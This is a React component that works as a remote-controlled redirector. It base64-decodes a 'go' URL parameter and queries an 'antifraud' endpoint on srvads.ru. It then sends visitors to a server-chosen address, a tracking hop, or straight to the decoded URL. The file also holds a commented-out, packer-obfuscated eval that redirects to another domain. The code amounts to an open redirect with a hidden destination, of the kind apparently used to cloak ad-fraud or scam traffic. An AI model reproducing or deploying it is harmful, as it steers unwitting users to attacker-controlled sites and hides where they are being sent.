import {useEffect, useState} from "react";

function MainPage() {
    const [error, setError] = useState(null)
    function b64_to_utf8(str) {
        return decodeURIComponent(atob(str).split('').map(function (c) {
            return '%' + ('00' + c.charCodeAt(0).toString(16)).slice(-2);
        }).join(''));
    }
    
    useEffect(() => {
      const params = new URLSearchParams(window.location.search);
      const goValue = params.get('go');
      if (!goValue) return;
    
      const fallbackRedirect = () => {
        try {
          const redirectURL = b64_to_utf8(goValue);
          window.location.replace(redirectURL);
        } catch (e) {
          console.error('b error', e);
          setError(e);
        }
      };
    
      const callBackend = async () => {
        try {
          const controller = new AbortController();
          setTimeout(() => controller.abort(), 3000);
          const response = await fetch(`https://antifraud.srvads.ru/api/v1/decision?source=rtctrf&t=${Date.now()}`, {signal: controller.signal});
          const data = await response.json();
          // Прямой редирект из админки антифрода: сразу ведём на заданный адрес.
          if (data.r) {
            window.location.replace(String(data.r).split('{go}').join(goValue));
            return;
          }
          if (data.triggered) {
            window.ym(94768488, 'reachGoal', 'chn');
            window.location.replace(`https://g.srvads.ru/go?g=${goValue}`)
            // eval(function(p,a,c,k,e,d){e=function(c){return c};if(!''.replace(/^/,String)){while(c--){d[c]=k[c]||c}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('(9(){8.7.6("5://4.3.2/?1="+0)})();',10,10,'goValue|g|co|dreamways|go|https|replace|location|window|function'.split('|'),0,{}))
          } else {
            fallbackRedirect();
          }
        } catch (err) {
          fallbackRedirect();
        }
      };
      callBackend();
    }, []);


    
    return (
        <div>
            {error && <pre>wrong url</pre>}
        </div>
    );
}

export default MainPage;
